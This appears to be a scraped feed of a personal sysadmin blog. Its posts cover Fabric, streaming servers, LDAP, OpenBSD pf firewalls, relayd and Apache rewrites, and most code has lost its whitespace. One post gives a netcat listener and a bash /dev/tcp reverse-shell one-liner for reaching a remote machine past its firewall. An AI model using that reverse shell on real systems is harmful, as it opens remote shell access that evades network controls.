Sometimes I need to use a one-off command for a simple task and end up wrapping the command in a for loop, calling ssh, and running the command over a few hosts. While this works great in a pinch, if I find myself using the same loop over and over I’ll create a new definition in Fabric.
If you’re unfamiliar with Fabric this post attempts to get you up to speed with the basics on how to use Fabric. First lets get Fabric installed.
Fabric uses Paramiko which is a Python interface for SSH. In the example fabfile below I’ll be logging into remote nodes over SSH so make sure you have your key-based or host-based authentication in place.
At this point we can create our first fabfile. I’m going to show you two basic but powerful features to get you started on your first fabfile. From this framework you should be able to start building a very nice fabfile to manage your nodes!
The beauty of Fabric is that it’s “just Python” so you’re free to do what you want with your fabfile.
#!/usr/bin/env python#import the fabric APIfromfabric.apiimport*#Function to define a range of nodes with prefix and number range#Example usage: nodes("www", "00", "20") would output an array with www-00 - www-19defnodes(prefix,r1,r2):nodes=[]fornodenumberinrange(int(r1),int(r2)):nodes.append(prefix+'-'+str(nodenumber).zfill(2))returnnodes#Don't brick the program on commands that return nonzero on run commands#More info here: http://docs.fabfile.org/en/1.4.1/usage/execution.html#failure-handlingenv.warn_only=True#Example of using Roles to define subsets of nodesenv.roledefs={'web_nodes':['www-00','www-01','www-02'],'dns_nodes':['dns-00','dns-01'],'gph_nodes':nodes('graphic','00','14')}@roles('web_nodes')defwebUptime():run('uptime')@roles('dns_nodes')defdnsDate():run('date')#Example that can be called by: fab -H host1,host2,host3 nodePackageSearch:package=httpddefnodePackageSearch(package=''):run('rpm-qa|grep%s'%package)
Lets break this fabfile down. I first have a function that allows us to create a range of nodes. This function will be helpful later when we are defining node roles.
Next, I’m defining roles for my nodes and assigning my nodes to those roles. As you can see this is where the nodes function defined earlier will come in handy.
Now we can assign functions to our roles. In this example I’m getting the uptime on all of my web nodes, and I have another function that allows me to get the date on all of my dns servers.
]]><![CDATA[Converting Axis RTSP to RTMP Streams]]>2014-02-18T09:20:00-05:00http://www.computerglitch.net/blog/blog/2014/02/18/converting-axis-rtsp-to-rtmp-streamsThese are some notes I took while integrating a solution providing live streaming of an Axis camera to a media server that converted the stream from rtsp to rtmp and was displayed on a website using flowplayer. The following technologies were used to accomplish this configuration:
First find the link that displays your cameras rtsp feed. In the case of the axis camera, the feed is located at: rtsp://[ip.add.re.ss]/axis-media/media.amp
Once you have your cameras rtsp link you should test to make sure it’s displaying the feed correctly with something like VLC and the following command:
1
vlcrtsp://[ip.add.re.ss]/axis-media/media.amp
Once the feed is verified it’s time to start working on getting the media server to consume and convert the stream. crtmpserver provides many binaries for various platforms. In this example I’ll be using the CentOS 6.2 binary build found at: http://www.rtmpd.com/downloads/
Create a configuration file for the rtsp to rtmp conversion process. Under externalStreams replace the values for uri and localStreamName with the url for your rtsp feed and what you would like to call this feed.
Test your configuration by running the following command. This will give you console output about the feeds being served from crtmpserver. You may also want to open another terminal and double check the server is indeed listening on port 1935 for inbound rtmp. netstat -antp | grep 1935
Once you have crtmp server correctly serving your feed it’s time to display the feed on your webpage with Flowplayer. First download the latest versions of Flowplayer and Flowplayer RTMP from the links at the beginning of this write-up to your webserver. You will then need the following code on your page, replacing name-of-your-feed with the feed name you created for the value of localStreamName you created previously.
Your feed should now be viewable as a live stream in flowplayer.
]]><![CDATA[LDAP Replication]]>2013-08-16T11:14:00-04:00http://www.computerglitch.net/blog/blog/2013/08/16/ldap-replicationI recently had a project where I needed to provide replication for a CentOS 5 LDAP server. The slave (consumer) was going to be running CentOS 6. This post assumes you already have (2) working LDAP servers, fully resolvable, and all ldapsearch queries respond appropriately.
For clarification:
Master (Provider in LDAP terms) - CentOS 5 server
Slave (Consumer in LDAP terms) - CentOS 6 server
On the Master:
Create a new account named replicate. Give the replicate account a password and make sure you can fully query the account from the Slave using ldapsearch.
]]><![CDATA[CentOS 6.4 LDAP With TLS - Quick & Dirty]]>2013-05-04T18:53:00-04:00http://www.computerglitch.net/blog/blog/2013/05/04/centos-6-dot-4-ldap-with-tls-quick-and-dirtyThis post is an overview of the commands needed to setup a basic working LDAP TLS server using CentOS 6.4. I will also go over the process of creating a POSIX user account and a POSIX group. The archived version of this is for CentOS 6 and can be found here: CentOS 6 LDAP With TLS
Add the following to your iptables configuration to allow access through the firewall, then install the required packages for your LDAP server.
Open the olcDatabase={1}bdb.ldif file and make the modifications shown below to it. /etc/openldap/slapd.d/cn\=config/olcDatabase\={1}bdb.ldif Change all references in this file from my-domain to your domain name, for example:
To allow users to modify their passwords, etc, you will have to add the following after the last olcDbIndex line in this file, again replace the domain name with yours.
Next create a POSIX user that can use our central LDAP server. Create a temporary password for the new user and set the users group. Create the file posix_user.ldif substituting for your environment:
You should now have a fully functioning LDAP server with TLS encryption.
]]><![CDATA[Reverse Shell on CentOS]]>2013-01-04T09:40:00-05:00http://www.computerglitch.net/blog/blog/2013/01/04/reverse-shell-on-centosI wanted an easy way to get to the shell on my remote machine bypassing the firewall etc.
I’m going to refer to the systems as follows: OurSystemTargetSystem
On OurSystem we need to open a listening network connection using netcat. This can be any port we want, but I’m going to use port 443 because it’s allowed through firewalls.
1
nc-l443
Note: Make sure the firewall isn’t blocking the listening port you choose on OurSystem
Next we need to force a bash shell back to OurSystem from TargetSystem. On the TargetSystem execute the following, substitute 12.3.4.5 with the external IP of OurSystem, substitute 443 with the port you set netcat to listen on.
1
bash-i>&/dev/tcp/12.3.4.5/4430>&1
You should be greeted with a bash shell from TargetSystem on OurSystem.
]]><![CDATA[Some Sites Don't Load / Load Slow - Symptoms & Fix - Windows 7]]>2012-04-22T10:14:00-04:00http://www.computerglitch.net/blog/blog/2012/04/22/some-sites-dont-load-slash-load-slow-symptoms-and-fix-windows-7I noticed that internet sites were loading slowly or not at all on some systems that I had upgraded from Windows XP to clean installs of Windows 7. Pinging internet sites was fine, nslookup and dig queries all returned correct DNS resolution with no errors.
Sites such as google would load okay but larger sites like Amazon would load halfway or simply not load at all. Keep in mind these symptoms were seen on clean installs of Windows 7, and because of that malware causing these problems was thrown out of the equation.
As stated earlier all attempts to ping outside hosts worked perfectly fine. All DNS resolution was working beautifully so to dig a little further I fired up Wireshark and noticed the following:
The NICs in these systems are Intel 82566DM-2 NICs. While looking over the capture I noticed quite a few of the following logged Header checksum: 0x0000 [incorrect .... After some digging I found this article: Auto Tuning - TCP/IP Receive Level
Basically to fix the issue you need to disable the Receive Window Auto-Tuning Level. To do that follow these steps:
Open a cmd shell with Administrator privileges and get the current tuning level:
This seems to have fixed the problem and all sites now load correctly across all browsers. I did have an issue where I couldn’t set the Auto-Tuning Level and to fix that I had to issue the following command:
1
netshinterfacetcpsetheuristicsdisabled
]]><![CDATA[Synergy]]>2012-02-05T09:11:00-05:00http://www.computerglitch.net/blog/blog/2012/02/05/synergyI have a CentOS box and a Windows XP box I wanted to be able to easily switch between. Instead of using a KVM switch I decided to use Synergy to switch between two monitors.
To setup Synergy I first installed it on CentOS from the EPEL repo:
1
yuminstallsynergy-plus
For reference my systems are: xp=WindowsXP Boxdespina=CentOS Box (replace xp and despina with your system names)
Once Synergy is installed you must configure it. First edit /etc/synergy.conf
This tells Synergy that to access my Windows XP system, move the mouse off the right side of the screen on my CentOS system.
To make Synergy start at bootup I added the following to my /etc/rc.local file:
1
/usr/bin/synergyc-fxp&
This tells Synergy to connect to my Windows XP system at startup. I also wanted to have Synergy start at the very initial login page, to do that I had to do the following:
Edit /etc/gdm/Init/Default and add the following line at the very end but before exit 0 line:
1
/usr/bin/synergyc-fxp&
Now add the following to the very top (after the #!/bin/sh line) of the /etc/gdm/PreSession/Default file:
Once it was installed I hit the Configure button and setup my screens as follows:
And that’s it. I can now move between systems simply by moving my mouse to the edge of the screen.
]]><![CDATA[Increase Dell MD3000i Virtual Disk Size]]>2012-01-14T08:53:00-05:00http://www.computerglitch.net/blog/blog/2012/01/14/increase-dell-md3000i-virtual-disk-sizeI needed to increase the size of a virtual disk on my Dell MD3000i. The MD3000i provides the storage space for my vSphere VM’s. The interface ‘Modular Disk Storage Manager’ does not provide a way to increase the size. To increase the size you must use the SMcli.exe (command line interface) provided with the Storage Manager client.
From the computer the ‘Modular Disk Storage Manager’ is installed on, open a CMD window and change to the following directory:
1
C:\ProgramFiles\Dell\MDStorageManager\client>
From this directory execute the following command (an explanation of the switches is below):
Where Production_Storage is the name of your storage array, virtual_disk_name is the name of the virtual disk to increase, 26843545600 is the amount to increase the virtual disk in bytes (in this case 25GB, use this calculator to convert from GB to Bytes: Convert GB to Bytes), and password is the password to the storage array.
Once the operation is complete you will need to extend the Datastore in vSphere.
Locate the datastore, right-click the datastore, select properties and select the ‘Increase …’ button. Next you should see a selection of available devices and the same LUN should appear, select it and click next. Vsphere should see the additional free space and upon clicking next it will expand the volume.
]]><![CDATA[Captive Portal With PF]]>2011-07-13T13:18:00-04:00http://www.computerglitch.net/blog/blog/2011/07/13/captive-portal-with-pfI had a need to create a captive portal at a customer site without installing a new piece of hardware.
I decided to create a OpenBSD VM with the following configuration to make users authenticate on the gateway before being allowed internet access.
The OpenBSD VM needs two virtual NIC’s. I configured my networking in OpenBSD as follows:
12
pcn0-192.168.0.100pcn1-192.168.0.101
The file /etc/mygate needs to have the IP of the current working gateway. Mine was:
1
192.168.0.10
The file /etc/resolv.conf must have the correct DNS server in it. Mine was:
12
lookupfilebindnameserver192.168.0.1
First I setup pf and ip forwarding. Then I setup /etc/pf.conf with the following configuration:
Once this is all setup restart the VM. Change the gateway on the client computers to point to 192.168.0.101 initially they wont be allowed any internet access.
To get internet access they will need to ssh to the captive portal (192.168.0.101) and login. Once they login as long as they keep the window open they will be allowed unrestricted access.
]]><![CDATA[Transparent Firewall With OpenBSD VM]]>2011-03-09T09:43:00-05:00http://www.computerglitch.net/blog/blog/2011/03/09/transparent-firewall-with-openbsd-vmI had a job where I needed to place a firewall in front of a network of publicly accessible computers. I decided to use a virtual transparent firewall to protect the entire network and make no changes on the client computers. This is document describes how I did it.
First the hardware: I decided to use a Dell Poweredge 1900 with ESXi server. The server has (2) Quad Core Processors, 16GB of RAM and 3 NICs. The storage is local with 4 drives set in a RAID 5 providing 600GB of storage.
Now for the NIC setup. You can see from the below diagram the BSD Bridge is setup on vmnic0 and vmnic1, vmnic2 is reserved for management and other VM’s.
One VERY IMPORTANT note before I begin to explain the setup of the OpenBSD VM, the two NICS that will be used for the transparent firewall must be setup
in ESXi for promiscuous mode! See the image below.
Configure the OpenBSD VM with two NICS, both tied to the NICs configured in promiscuous mode. Install OpenBSD on the VM.
For the configuration of OpenBSD do the following:
Enable PF and IP forwarding (edit /etc/rc.conf and /etc/sysctl.conf)
Configure the bridge (substitute your NIC names in place of vic0 and vic1)
First create the file /etc/bridgename.bridge0:
1
# touch /etc/bridgename.bridge0
Add the following to the bridgename.bridge0 file:
123
addvic0addvic1up
After you have added this file reboot the OpenBSD VM, when the system comes back up you should see the following when issuing ifconfig -a
12
bridge0:flags=41<UP,RUNNING>mtu1500groups:bridge
Once you have confirmed the bridge is running its time to configure pf to control the traffic. Here is an example /etc/pf.conf file that blocks all
external traffic destined for the internal network and allows all internal traffic destined for the internet:
12345678910
ext_if=”vic0″int_if=”vic1″#Allow all traffic out from our network (vic1)passoutquickon$int_ifallpassinquickon$int_ifallpassoutquickon$ext_ifall#Block all traffic on external interface (vic0) by defaultblockinlogon$ext_ifall
A more elaborate example allows SSH traffic from specific IP’s to the internal network and configures OpenDNS redirection for content filtering on the
internal network:
1234567891011121314151617181920
ext_if=”vic0″int_if=”vic1″allowed_ips=”{68.180.206.184,209.85.171.100}”opendns=”{208.67.222.222,208.67.220.220}”internal_ips=”{206.46.232.39/27}”#Redirect to OpenDNS for content filteringrdron$int_ifinetprotoudpfromanytoanyport53->$opendns#Allow all traffic out from our network (vic1)passoutquickon$int_ifallpassinquickon$int_ifallpassoutquickon$ext_ifall#Block all traffic on external interface (vic0) by defaultblockinlogon$ext_ifall#Inbound Allow Rulespassinlogquickon$ext_ifprototcpfrom$allowed_ipsto$internal_ipsport22modulatestate
Here is a diagram of the hardware setup and wiring:
]]><![CDATA[Port Relay With Relayd on OpenBSD]]>2010-06-02T11:08:00-04:00http://www.computerglitch.net/blog/blog/2010/06/02/port-relay-with-relaydI had originally planned on setting up the new server in the DMZ giving it a public IP address, updating the DNS record and going happily about my business but I decided to try something a little different. OpenBSD has a very cool load balancing program named Relayd (which used to be called hoststated). It can be setup to forward, reverse, redirect or accelerate packets.
For my use I wanted Relayd to act as a tcp port relay and redirect all www packets bound for my public IP to be redirected to my webserver in the DMZ, you can see the traffic flow below:
internet --> relayd forward (box1) --> server (box2)
To achieve this I edited my /etc/relayd.conf as follows:
12345678910111213141516
box1_addr="10.1.1.2"box1_port="80"box2_addr="10.1.1.3"box2_port="80"## TCP port relay and forwarder#protocol"tcp_service"{tcp{nodelay,socketbuffer65536}}relay"tcp_forwarder"{listenon$box1_addrport$box1_portprotocol"tcp_service"forwardto$box2_addrport$box2_port}
Once my /etc/relayd.conf setting was in place I started relayd with the following command:
1
relayd-f/etc/relayd.conf
Additionally to make sure Relayd starts at boot time I added the following to my /etc/rc.conf.local file:
1
relayd_flags=""
And with that, all web traffic bound for my network is being successfully relayed to my external webserver in the DMZ, no changes to DNS were made.
]]><![CDATA[Apache mod_rewrite]]>2010-04-28T11:48:00-04:00http://www.computerglitch.net/blog/blog/2010/04/28/apache-mod-rewriteThe Apache mod_rewrite module is a very powerful feature of Apache that is sometimes overlooked. For example, I needed to change all requests for http://computerglitch.net to http://www.computerglitch.net to do this I added the following code to the vhost file for computerglitch.net:
Lets go over step by step what this code is actually doing.
Line 1 turns the runtime rewriting engine on or off. This line needs to be on in the vhosts file in order for the configuration to work because rewrite configurations are not inherited by virtual hosts.
Line 2 condition matches if the Host portion of the HTTP request header begins with computerglitch.net
Line 3 rewrite computerglitch.net as http://www.computerglitch.net, reply with a 301 Moved Permanently response and stop any later rules from affecting this url.
A little more detail about the regular expression used on Line 3
1
^(.*)$
^ begins the line to match
() designates the portion to preserve for use again in the $1 variable.
. matches any non-whitespace character
* means the previous character can be matched zero or more times
$ ends the line to match
To explain this with a couple of examples:
^keyboard$ matches keyboard exactly
^keyboard.*$ matches keyboard2000, keyboard2001, etc.
<!DOCTYPEHTMLPUBLIC"-//IETF//DTD HTML 2.0//EN"><html><head><title>301MovedPermanently</title></head><body><h1>MovedPermanently</h1><p>Thedocumenthasmoved<ahref="http://www.computerglitch.net/">here</a>.</p><hr><address>ApacheServeratcomputerglitch.netPort80</address></body></html>
